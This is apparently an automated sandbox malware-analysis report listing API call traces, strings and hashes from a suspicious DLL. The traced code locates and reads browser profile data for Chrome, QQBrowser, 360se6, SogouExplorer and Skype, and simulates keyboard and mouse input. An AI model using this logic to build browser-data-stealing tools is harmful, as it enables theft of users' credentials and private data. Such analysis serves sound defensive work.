                                                  • Instruction Fuzzy Hash: AD515B31BC471576F234CA648C87F4A7AA4FB85F90F708611B708BE1C4D6F0F980869A
                                                  APIs
                                                    • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                    • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                    • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                    • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                    • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                  • SetCursorPos.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D88
                                                  • WindowFromPoint.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D90
                                                  • SetCapture.USER32(00000000,?,?,?,?,1001697A,?,?), ref: 10016D97
                                                  • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001697A,?,?), ref: 10016DAD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10016DB0
                                                  • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001697A,?,?), ref: 10016DBE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10016DC1
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10016DFA
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10016E14
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                  • String ID: USER32.dll$keybd_event$mouse_event
                                                  • API String ID: 1441364844-718119381
                                                  • Opcode ID: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                  • Instruction ID: 9bdd7654e0fc0f02893d67ce9a41b80379b50915a00eb774664f2f349eb60d67
                                                  • Opcode Fuzzy Hash: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                  • Instruction Fuzzy Hash: C3515E3ABC0729B7F630DA64CD47F5A6A94EB49F90F314615B704BE1C1D5F0F8808A99
                                                  APIs
                                                    • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                    • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                  • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D12
                                                  • LoadLibraryA.KERNEL32(CHROMEUSERINFO.dll,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D22
                                                  • GetProcAddress.KERNEL32(00000000,fnGetChromeUserInfo), ref: 10002D3E
                                                  • GetProcAddress.KERNEL32(00000000,fnDeleteChromeUserInfo), ref: 10002D4C
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E53
                                                  • LocalSize.KERNEL32(00000000), ref: 10002E5C
                                                  • LocalFree.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AddressProc$AllocLibraryLoad$FreeSize
                                                  • String ID: CHROMEUSERINFO.dll$CHROME_NO_DATA$CHROME_UNKNOW$fnDeleteChromeUserInfo$fnGetChromeUserInfo
                                                  • API String ID: 1379963177-1650604611
                                                  • Opcode ID: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                  • Instruction ID: 13833c0b53df42460e1e6170d0b02e4772bea98369ed9403c64bee1aaa194fbe
                                                  • Opcode Fuzzy Hash: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                  • Instruction Fuzzy Hash: DF4123716002585FD728CF288C45AAF7BD5FB8A7A0F580729F90AE7780CB79DE018791
                                                  APIs
                                                  • #537.MFC42(360se6.exe), ref: 1000F047
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F05F
                                                  • #540.MFC42 ref: 1000F069
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F09B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0B3
                                                  • #800.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0C4
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0CE
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000F0ED
                                                  • #800.MFC42 ref: 1000F101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
                                                  • API String ID: 1983172782-1244823433
                                                  • Opcode ID: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                  • Instruction ID: e9c89288d271108546bef61020c2a1418b1faed9b041f6e65e1a09c7bde258f6
                                                  • Opcode Fuzzy Hash: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                  • Instruction Fuzzy Hash: F6216579408788ABE364DB54D942FDFB7D4EB84710F40891CF29D821D6EB74A504CBA3
                                                  APIs
                                                  • #537.MFC42(QQBrowser.exe), ref: 1000F147
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F15F
                                                  • #540.MFC42 ref: 1000F169
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F19B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1B3
                                                  • #800.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1C4
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1CE
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000F1ED
                                                  • #800.MFC42 ref: 1000F201
                                                  Strings
                                                  • QQBrowser.exe, xrefs: 1000F142
                                                  • \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 1000F1A0
                                                  • C:\Users\, xrefs: 1000F195
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
                                                  • API String ID: 1983172782-2662846904
                                                  APIs
                                                  • #537.MFC42(SogouExplorer.exe), ref: 1000F247
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F25F
                                                  • #540.MFC42 ref: 1000F269
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F29B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2B3
                                                  • #800.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2C4
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2CE
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000F2ED
                                                  • #800.MFC42 ref: 1000F301
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
                                                  • API String ID: 1983172782-2055279553
                                                  APIs
                                                  • #537.MFC42(chrome.exe), ref: 1000EE07
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EE1F
                                                  • #540.MFC42 ref: 1000EE29
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EE5B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE73
                                                  • #800.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE84
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE8E
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000EEAD
                                                  • #800.MFC42 ref: 1000EEC1
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                  • API String ID: 1983172782-2559963756
                                                  APIs
                                                  • #537.MFC42(Skype.exe), ref: 1000EF07
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EF1F
                                                  • #540.MFC42 ref: 1000EF29
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EF5B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF73
                                                  • #800.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF84
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF8E
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
